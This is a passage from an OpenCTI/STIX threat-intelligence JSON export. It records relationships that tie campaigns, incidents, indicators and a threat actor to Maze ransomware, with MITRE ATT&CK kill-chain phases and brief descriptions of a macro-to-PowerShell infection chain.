"modified": "2020-02-04T15:47:58.765Z",
"x_opencti_first_seen": "2020-01-15T23:00:00.000Z",
"x_opencti_last_seen": "2020-01-15T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "b327e979-78a5-42c5-8d8e-ddbedbe60087",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
],
"kill_chain_phases": [
{
"id": "kill-chain-phase--5a036e0e-9cb2-4add-b669-d61285790656",
"kill_chain_name": "mitre-attack",
"phase_name": "impact",
"x_opencti_id": "52deaaf0-805a-4105-bed3-9133c89dd1e1",
"x_opencti_phase_order": 0,
"x_opencti_created": "2019-09-18T13:36:37.000Z",
"x_opencti_modified": "2019-09-18T13:36:37.000Z"
}
]
},
{
"id": "relationship--dff57daf-f597-4a66-a9bb-ad6487f1bb66",
"type": "relationship",
"relationship_type": "localization",
"source_ref": "organization--a0eef190-9335-40a7-bab2-bcf6179a28fe",
"target_ref": "identity--0700254d-cc41-4655-8e9e-f2b7ef9e38f6",
"x_opencti_source_ref": "organization--a0eef190-9335-40a7-bab2-bcf6179a28fe",
"x_opencti_target_ref": "identity--0700254d-cc41-4655-8e9e-f2b7ef9e38f6",
"created": "2020-02-04T15:48:45.296Z",
"modified": "2020-02-04T15:48:45.296Z",
"x_opencti_first_seen": "2020-01-15T23:00:00.000Z",
"x_opencti_last_seen": "2020-01-15T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "e9379750-75d9-4fab-8a4b-043b72cbc18e",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--4332e775-2fbf-4c61-9513-a24d554d6099",
"type": "relationship",
"relationship_type": "localization",
"source_ref": "organization--f6700d44-b1db-4065-ba64-ed02034a7cd6",
"target_ref": "identity--23c518a8-e30c-4813-bcef-4001cd834929",
"x_opencti_source_ref": "organization--f6700d44-b1db-4065-ba64-ed02034a7cd6",
"x_opencti_target_ref": "identity--23c518a8-e30c-4813-bcef-4001cd834929",
"created": "2020-02-04T16:03:29.624Z",
"modified": "2020-02-04T16:03:29.624Z",
"x_opencti_first_seen": "2020-11-30T23:00:00.000Z",
"x_opencti_last_seen": "2020-11-30T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "444d6f61-f7c7-47a2-9c23-543bea34a906",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--ec3deac6-a9df-4987-947c-b6ec35871d3e",
"type": "relationship",
"relationship_type": "related-to",
"source_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"target_ref": "incident--b18649a4-b77c-4f50-838d-5aca5fb727ba",
"x_opencti_source_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"x_opencti_target_ref": "incident--b18649a4-b77c-4f50-838d-5aca5fb727ba",
"created": "2020-02-04T16:07:26.423Z",
"modified": "2020-02-04T16:07:26.423Z",
"x_opencti_first_seen": "2019-04-30T22:00:00.000Z",
"x_opencti_last_seen": "2019-11-17T23:00:00.000Z",
"x_opencti_weight": 2,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "4ccff364-96c3-428c-9e0c-8e97f30819d9",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--2c3bb531-75e8-4337-9f21-e181956ed8ca",
"type": "relationship",
"relationship_type": "indicates",
"source_ref": "indicator--8895042c-7c13-4d86-a4de-6e8b560a0519",
"target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"x_opencti_source_ref": "indicator--8895042c-7c13-4d86-a4de-6e8b560a0519",
"x_opencti_target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"created": "2020-02-05T10:00:24.052Z",
"modified": "2020-02-05T10:00:24.052Z",
"x_opencti_first_seen": "2020-02-05T10:00:24.052Z",
"x_opencti_last_seen": "2020-02-05T10:00:24.052Z",
"x_opencti_weight": 1,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "df247c92-f9fb-4c18-9f00-09bd525a7527",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--cd3b1416-3550-4c03-84c9-deeebe1bf6e3",
"type": "relationship",
"relationship_type": "indicates",
"source_ref": "indicator--6cf4aa42-fe72-4cb8-a91d-c54b09533a8d",
"target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"x_opencti_source_ref": "indicator--6cf4aa42-fe72-4cb8-a91d-c54b09533a8d",
"x_opencti_target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"created": "2020-02-05T10:04:48.532Z",
"modified": "2020-02-05T10:04:48.532Z",
"x_opencti_first_seen": "2020-02-05T10:04:48.532Z",
"x_opencti_last_seen": "2020-02-05T10:04:48.532Z",
"x_opencti_weight": 1,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "996960b3-3816-4c6e-9207-564118ac0f42",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--4b5067b7-c297-4ad7-a4c4-5ddeab47996d",
"type": "relationship",
"relationship_type": "indicates",
"source_ref": "indicator--699fa50b-7154-4581-b5c4-cd62d8c04a7d",
"target_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"x_opencti_source_ref": "indicator--699fa50b-7154-4581-b5c4-cd62d8c04a7d",
"x_opencti_target_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"created": "2020-02-05T10:05:14.677Z",
"modified": "2020-02-05T10:05:14.677Z",
"x_opencti_first_seen": "2020-02-05T10:05:14.677Z",
"x_opencti_last_seen": "2020-02-05T10:05:14.677Z",
"x_opencti_weight": 1,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "7259641f-362e-42c2-8fc1-e792982ff262",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--927f8898-69f6-4815-a389-b92be0920466",
"type": "relationship",
"relationship_type": "indicates",
"source_ref": "indicator--4d3eb24a-9f23-48a8-9282-ec2987012725",
"target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"x_opencti_source_ref": "indicator--4d3eb24a-9f23-48a8-9282-ec2987012725",
"x_opencti_target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"created": "2020-02-05T10:05:46.590Z",
"modified": "2020-02-05T10:05:46.590Z",
"x_opencti_first_seen": "2020-02-05T10:05:46.590Z",
"x_opencti_last_seen": "2020-02-05T10:05:46.590Z",
"x_opencti_weight": 1,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "d6a52775-3cc9-410d-a11f-0f2bab644c2e",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--b26692b6-492a-4975-a48c-0532813f3bd7",
"type": "relationship",
"relationship_type": "indicates",
"source_ref": "indicator--d7519fd7-a6f1-4c05-86b6-39397c61c5b5",
"target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"x_opencti_source_ref": "indicator--d7519fd7-a6f1-4c05-86b6-39397c61c5b5",
"x_opencti_target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"created": "2020-02-05T10:05:52.797Z",
"modified": "2020-02-05T10:05:52.797Z",
"x_opencti_first_seen": "2020-02-05T10:05:52.797Z",
"x_opencti_last_seen": "2020-02-05T10:05:52.797Z",
"x_opencti_weight": 1,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "ff556562-0bd9-4ff8-a970-e58aa11bf35d",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--aac9bb6c-e142-4caf-a1a3-67c627bbc04a",
"type": "relationship",
"relationship_type": "indicates",
"source_ref": "indicator--05024cf6-871c-4274-bc86-103dce87bab7",
"target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"x_opencti_source_ref": "indicator--05024cf6-871c-4274-bc86-103dce87bab7",
"x_opencti_target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"created": "2020-02-05T10:06:07.673Z",
"modified": "2020-02-05T10:06:07.673Z",
"x_opencti_first_seen": "2020-02-05T10:06:07.673Z",
"x_opencti_last_seen": "2020-02-05T10:06:07.673Z",
"x_opencti_weight": 1,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "b788f395-1158-4b99-ad5d-7442603907ad",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--16d0e325-54d2-485d-86b0-0b041661ec95",
"type": "relationship",
"relationship_type": "indicates",
"source_ref": "indicator--4f6cfd26-3328-40e5-90f7-e05d94fde810",
"target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"x_opencti_source_ref": "indicator--4f6cfd26-3328-40e5-90f7-e05d94fde810",
"x_opencti_target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"created": "2020-02-05T10:06:10.638Z",
"modified": "2020-02-05T10:06:10.638Z",
"x_opencti_first_seen": "2020-02-05T10:06:10.638Z",
"x_opencti_last_seen": "2020-02-05T10:06:10.638Z",
"x_opencti_weight": 1,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "41d44006-f39d-4abe-94f8-609aa412261a",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--0838f4ff-c6ed-4aac-9401-4dfb3bfc7bc6",
"type": "relationship",
"relationship_type": "attributed-to",
"source_ref": "campaign--4b02ceb0-e15c-40ea-b91b-4bbe0704c198",
"target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"x_opencti_source_ref": "campaign--4b02ceb0-e15c-40ea-b91b-4bbe0704c198",
"x_opencti_target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"created": "2020-01-07T14:48:33.908Z",
"modified": "2020-01-07T14:48:33.908Z",
"x_opencti_first_seen": "2019-11-11T23:00:00.000Z",
"x_opencti_last_seen": "2019-11-11T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "eddb7f37-83ea-4306-bf11-a90fc023ffcd",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--7278efc9-d16f-4f1e-9902-c44eac1ddfc6",
"type": "relationship",
"relationship_type": "attributed-to",
"source_ref": "campaign--35104704-87a9-4177-8952-ba73a0c3d9e3",
"target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"x_opencti_source_ref": "campaign--35104704-87a9-4177-8952-ba73a0c3d9e3",
"x_opencti_target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"created": "2020-01-07T14:35:36.523Z",
"modified": "2020-01-07T14:35:36.523Z",
"x_opencti_first_seen": "2019-10-28T23:00:00.000Z",
"x_opencti_last_seen": "2019-10-28T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "a43cf423-441f-48f3-8c56-6c9c55d2f5b9",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--58a80e8b-9ae2-4c52-80dd-85d77ceaa1df",
"type": "relationship",
"relationship_type": "uses",
"description": "The emails, as part of a low-volume campaign across multiple\nverticals, were targeted primarily at manufacturing companies and\nused an infection chain of Microsoft Office macros into a\nPowerShell script, which ultimately downloads and installs Maze\nransomware.",
"source_ref": "campaign--35104704-87a9-4177-8952-ba73a0c3d9e3",
"target_ref": "attack-pattern--f4882e23-8aa7-4b12-b28a-b349c12ee9e0",
"x_opencti_source_ref": "campaign--35104704-87a9-4177-8952-ba73a0c3d9e3",
"x_opencti_target_ref": "attack-pattern--f4882e23-8aa7-4b12-b28a-b349c12ee9e0",
"created": "2020-01-07T14:37:02.412Z",
"modified": "2020-01-07T14:37:02.412Z",
"x_opencti_first_seen": "2019-10-28T23:00:00.000Z",
"x_opencti_last_seen": "2019-10-28T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "46c034d3-9d20-4478-acb2-9f72dcd43321",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
],
"kill_chain_phases": [
{
"id": "kill-chain-phase--affdc44d-4a4a-4ffa-a391-9593344c468a",
"kill_chain_name": "mitre-attack",
"phase_name": "execution",
"x_opencti_id": "c4f5146a-9d20-3165-a443-f2046980029d",
"x_opencti_phase_order": 0,
"x_opencti_created": "2019-04-15T16:53:35.000Z",
"x_opencti_modified": "2019-04-15T16:53:35.000Z"
}
]
},
{
"id": "relationship--7b15dda1-f16b-4853-b09c-82929f243c0f",
"type": "relationship",
"relationship_type": "uses",
"description": "The Microsoft Word attachment, when opened, executes a Microsoft Office macro that, in turn, executes a PowerShell script, which downloads and installs the Maze ransomware payload onto\nthe victim\u2019s system.",
"source_ref": "campaign--aae8b913-564b-405e-a9c1-5e5ea6c60259",
"target_ref": "attack-pattern--f4882e23-8aa7-4b12-b28a-b349c12ee9e0",
"x_opencti_source_ref": "campaign--aae8b913-564b-405e-a9c1-5e5ea6c60259",
"x_opencti_target_ref": "attack-pattern--f4882e23-8aa7-4b12-b28a-b349c12ee9e0",
"created": "2020-01-07T14:31:46.592Z",
"modified": "2020-01-07T14:31:46.592Z",
"x_opencti_first_seen": "2019-10-15T22:00:00.000Z",
"x_opencti_last_seen": "2019-10-22T22:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "f516fc10-0c0a-4bf6-9ac9-cdb0c6dde8d5",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
],
"kill_chain_phases": [
{
"id": "kill-chain-phase--affdc44d-4a4a-4ffa-a391-9593344c468a",
"kill_chain_name": "mitre-attack",
"phase_name": "execution",
"x_opencti_id": "c4f5146a-9d20-3165-a443-f2046980029d",
"x_opencti_phase_order": 0,
"x_opencti_created": "2019-04-15T16:53:35.000Z",
"x_opencti_modified": "2019-04-15T16:53:35.000Z"
}
]
},
{
"id": "relationship--704cfd8c-f9b9-41a7-9816-4fa48a222fef",
"type": "relationship",
"relationship_type": "uses",
"description": "Delivered by spearsphishing attachment.",
"source_ref": "campaign--4b02ceb0-e15c-40ea-b91b-4bbe0704c198",
"target_ref": "malware--c521e7de-aeb9-439b-8bb3-cd93a88f27ea",
"x_opencti_source_ref": "campaign--4b02ceb0-e15c-40ea-b91b-4bbe0704c198",
"x_opencti_target_ref": "malware--c521e7de-aeb9-439b-8bb3-cd93a88f27ea",
"created": "2020-02-04T14:42:37.501Z",
"modified": "2020-02-04T14:42:37.501Z",
"x_opencti_first_seen": "2019-10-15T22:00:00.000Z",
"x_opencti_last_seen": "2019-10-22T22:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "643db9b4-793e-4873-a355-8be957954b0e",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
],
"kill_chain_phases": [
{
"id": "kill-chain-phase--9757781f-2322-4a4e-8651-64a6e883c538",
"kill_chain_name": "mitre-attack",
"phase_name": "command-and-control",
"x_opencti_id": "13cfffc3-1a9e-3c61-9316-0df2bbd23390",
"x_opencti_phase_order": 0,
"x_opencti_created": "2019-04-15T16:56:35.000Z",
"x_opencti_modified": "2019-04-15T16:56:35.000Z"
},
{
"id": "kill-chain-phase--20aa9cbb-eb48-4569-9860-f0de6dab6b12",
"kill_chain_name": "mitre-attack",
"phase_name": "initial-access",
"x_opencti_id": "471c7de8-e846-3fc9-a57e-4a7b770b8f1d",
"x_opencti_phase_order": 0,
"x_opencti_created": "2019-04-15T17:00:39.000Z",
"x_opencti_modified": "2019-04-15T17:00:39.000Z"
}
]
},
{
"id": "relationship--023e9621-78d7-48ac-a9aa-fe54b55b1271",
"type": "relationship",
"relationship_type": "uses",
"description": "The emails, as part of a low-volume campaign across multiple\nverticals, were targeted primarily at manufacturing companies and\nused an infection chain of Microsoft Office macros into a\nPowerShell script, which ultimately downloads and installs Maze\nransomware.",
"source_ref": "campaign--35104704-87a9-4177-8952-ba73a0c3d9e3",
"target_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"x_opencti_source_ref": "campaign--35104704-87a9-4177-8952-ba73a0c3d9e3",
"x_opencti_target_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"created": "2020-01-07T14:37:13.659Z",
"modified": "2020-01-07T14:37:13.659Z",
"x_opencti_first_seen": "2019-10-28T23:00:00.000Z",
"x_opencti_last_seen": "2019-10-28T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "fd1d72c9-8b7c-4d57-afba-6cc13d6e9117",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
],
"kill_chain_phases": [
{
"id": "kill-chain-phase--5a036e0e-9cb2-4add-b669-d61285790656",
"kill_chain_name": "mitre-attack",
"phase_name": "impact",
"x_opencti_id": "52deaaf0-805a-4105-bed3-9133c89dd1e1",
"x_opencti_phase_order": 0,
"x_opencti_created": "2019-09-18T13:36:37.000Z",
"x_opencti_modified": "2019-09-18T13:36:37.000Z"
}
]
},
{
"id": "relationship--528c12c0-42ae-4c68-bbd5-733b34510517",
"type": "relationship",
"relationship_type": "uses",
"source_ref": "campaign--2f94c044-1f99-4ecd-b3e4-2ac55aa8752d",
"target_ref": "malware--c6006dd5-31ca-45c2-8ae0-4e428e712f88",
"x_opencti_source_ref": "campaign--2f94c044-1f99-4ecd-b3e4-2ac55aa8752d",
"x_opencti_target_ref": "malware--c6006dd5-31ca-45c2-8ae0-4e428e712f88",
"created": "2020-02-04T14:49:06.241Z",
"modified": "2020-02-04T14:49:06.241Z",
"x_opencti_first_seen": "2019-04-30T22:00:00.000Z",
"x_opencti_last_seen": "2019-10-17T22:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "95a1cb81-cdd3-4b79-9f6d-48067182695b",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
],
"kill_chain_phases": [
{
"id": "kill-chain-phase--20aa9cbb-eb48-4569-9860-f0de6dab6b12",
"kill_chain_name": "mitre-attack",
"phase_name": "initial-access",
"x_opencti_id": "471c7de8-e846-3fc9-a57e-4a7b770b8f1d",
"x_opencti_phase_order": 0,
"x_opencti_created": "2019-04-15T17:00:39.000Z",
"x_opencti_modified": "2019-04-15T17:00:39.000Z"
}
]
},
{
"id": "relationship--93d3d709-0d95-4465-834b-4704ad1665f8",
"type": "relationship",
"relationship_type": "uses",
"source_ref": "incident--b0c526ac-b80a-4e61-87bf-85f0826923b3",
"target_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"x_opencti_source_ref": "incident--b0c526ac-b80a-4e61-87bf-85f0826923b3",
"x_opencti_target_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"created": "2020-01-08T16:00:47.981Z",
"modified": "2020-01-08T16:00:47.981Z",
"x_opencti_first_seen": "2019-12-10T23:00:00.000Z",
"x_opencti_last_seen": "2019-12-23T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "629459c6-c51b-4120-ae44-5fbacee22913",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
],
"kill_chain_phases": [
{
"id": "kill-chain-phase--5a036e0e-9cb2-4add-b669-d61285790656",
"kill_chain_name": "mitre-attack",
"phase_name": "impact",
"x_opencti_id": "52deaaf0-805a-4105-bed3-9133c89dd1e1",
"x_opencti_phase_order": 0,
"x_opencti_created": "2019-09-18T13:36:37.000Z",
"x_opencti_modified": "2019-09-18T13:36:37.000Z"
}
]
},
{
"id": "relationship--ef64aac0-ae6b-4660-b7f9-44d8ceb81c1c",
"type": "relationship",
"relationship_type": "gathering",
"source_ref": "organization--26cdeaa6-f435-4857-b631-27c247cd041d",
"target_ref": "identity--040b3a47-41a6-44d0-91f9-08614ba67364",
"x_opencti_source_ref": "organization--26cdeaa6-f435-4857-b631-27c247cd041d",
"x_opencti_target_ref": "identity--040b3a47-41a6-44d0-91f9-08614ba67364",
"created": "2020-02-04T15:34:52.200Z",
"modified": "2020-02-04T15:34:52.200Z",
"x_opencti_first_seen": "2020-01-20T23:00:00.000Z",
"x_opencti_last_seen": "2020-01-20T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "e029aeac-8880-4a58-bb86-5b4ed217a5db",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--7ae37c11-aa56-4155-99c6-72e0aecff7ea",
"type": "relationship",
"relationship_type": "localization",
"source_ref": "organization--5b705ce2-ff85-4cc7-8264-63fdccf6fc92",
"target_ref": "identity--0700254d-cc41-4655-8e9e-f2b7ef9e38f6",
"x_opencti_source_ref": "organization--5b705ce2-ff85-4cc7-8264-63fdccf6fc92",
"x_opencti_target_ref": "identity--0700254d-cc41-4655-8e9e-f2b7ef9e38f6",
"created": "2020-02-04T15:41:04.644Z",
"modified": "2020-02-04T15:41:04.644Z",
"x_opencti_first_seen": "2020-01-11T23:00:00.000Z",
"x_opencti_last_seen": "2020-01-11T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "2eb3c5a2-a0d2-4540-8107-b61c90e0dd2e",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--958d972f-186c-4bc0-b1b4-453c0d4dc8b1",
"type": "relationship",
"relationship_type": "uses",
"source_ref": "incident--d32b3420-3309-4d77-b4bf-285d9f6fd883",
"target_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"x_opencti_source_ref": "incident--d32b3420-3309-4d77-b4bf-285d9f6fd883",
"x_opencti_target_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"created": "2020-02-04T15:44:07.399Z",
"modified": "2020-02-04T15:44:07.399Z",
"x_opencti_first_seen": "2020-01-28T23:00:00.000Z",
"x_opencti_last_seen": "2020-01-28T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "5b686f15-7d54-43f8-8b0a-9b1281b3269c",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
],
"kill_chain_phases": [
{
"id": "kill-chain-phase--5a036e0e-9cb2-4add-b669-d61285790656",
"kill_chain_name": "mitre-attack",
"phase_name": "impact",
"x_opencti_id": "52deaaf0-805a-4105-bed3-9133c89dd1e1",
"x_opencti_phase_order": 0,
"x_opencti_created": "2019-09-18T13:36:37.000Z",
"x_opencti_modified": "2019-09-18T13:36:37.000Z"
}
]
},
{
"id": "relationship--22bc2200-846f-4552-ad7f-8993489eabfe",
"type": "relationship",
"relationship_type": "targets",
"source_ref": "incident--ec987884-bbe1-4407-93aa-8225d2b1feae",
"target_ref": "organization--a0eef190-9335-40a7-bab2-bcf6179a28fe",
"x_opencti_source_ref": "incident--ec987884-bbe1-4407-93aa-8225d2b1feae",
"x_opencti_target_ref": "organization--a0eef190-9335-40a7-bab2-bcf6179a28fe",
"created": "2020-02-04T15:48:06.664Z",
"modified": "2020-02-04T15:48:06.664Z",
"x_opencti_first_seen": "2020-01-15T23:00:00.000Z",
"x_opencti_last_seen": "2020-01-15T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "7b123d30-b3d6-49d3-ae3d-8f2d81ed3795",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--e834fc63-5daf-468e-bf2d-4cfc1c15c745",
"type": "relationship",
"relationship_type": "related-to",
"source_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"target_ref": "incident--996222f5-b03f-4055-9265-34bbfe9e95a4",
"x_opencti_source_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"x_opencti_target_ref": "incident--996222f5-b03f-4055-9265-34bbfe9e95a4",
"created": "2020-02-04T16:07:16.026Z",
"modified": "2020-02-04T16:07:16.026Z",
"x_opencti_first_seen": "2019-04-30T22:00:00.000Z",
"x_opencti_last_seen": "2019-11-17T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "0621c2e5-dce2-4aa2-8a6e-e8d5f5d3c063",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--33e2068b-067d-480c-be0e-4f2e71645f85",
"type": "relationship",
"relationship_type": "indicates",
"source_ref": "indicator--614df552-e5e7-44b1-b473-22efdf5a1546",
"target_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"x_opencti_source_ref": "indicator--614df552-e5e7-44b1-b473-22efdf5a1546",
"x_opencti_target_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"created": "2020-02-05T10:05:23.182Z",
"modified": "2020-02-05T10:05:23.182Z",
"x_opencti_first_seen": "2020-02-05T10:05:23.182Z",
"x_opencti_last_seen": "2020-02-05T10:05:23.182Z",
"x_opencti_weight": 1,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "4a6144a1-2445-42fd-a6ee-8d15e889f96d",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--4819490a-9414-4b8d-8208-87dc2a33f584",
"type": "relationship",
"relationship_type": "indicates",
"source_ref": "indicator--4eef17b7-4ba6-46bc-8ed7-1a29826cf7b2",
"target_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"x_opencti_source_ref": "indicator--4eef17b7-4ba6-46bc-8ed7-1a29826cf7b2",
"x_opencti_target_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"created": "2020-02-05T10:05:34.829Z",
"modified": "2020-02-05T10:05:34.829Z",
"x_opencti_first_seen": "2020-02-05T10:05:34.829Z",
"x_opencti_last_seen": "2020-02-05T10:05:34.829Z",
"x_opencti_weight": 1,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "f3b3e5d6-9527-46b5-88af-4b8047140b1c",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--14e23cd7-1a6d-422e-b1a6-61cb53e01215",
"type": "relationship",
"relationship_type": "indicates",
"source_ref": "indicator--16c3d153-3516-4637-aba4-cccf05121fcd",
"target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"x_opencti_source_ref": "indicator--16c3d153-3516-4637-aba4-cccf05121fcd",
"x_opencti_target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"created": "2020-02-05T10:06:26.060Z",
"modified": "2020-02-05T10:06:26.060Z",
"x_opencti_first_seen": "2020-02-05T10:06:26.060Z",
"x_opencti_last_seen": "2020-02-05T10:06:26.060Z",
"x_opencti_weight": 1,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "6bb2c634-161d-4660-8c0b-4a2485bcc899",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
}
]
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment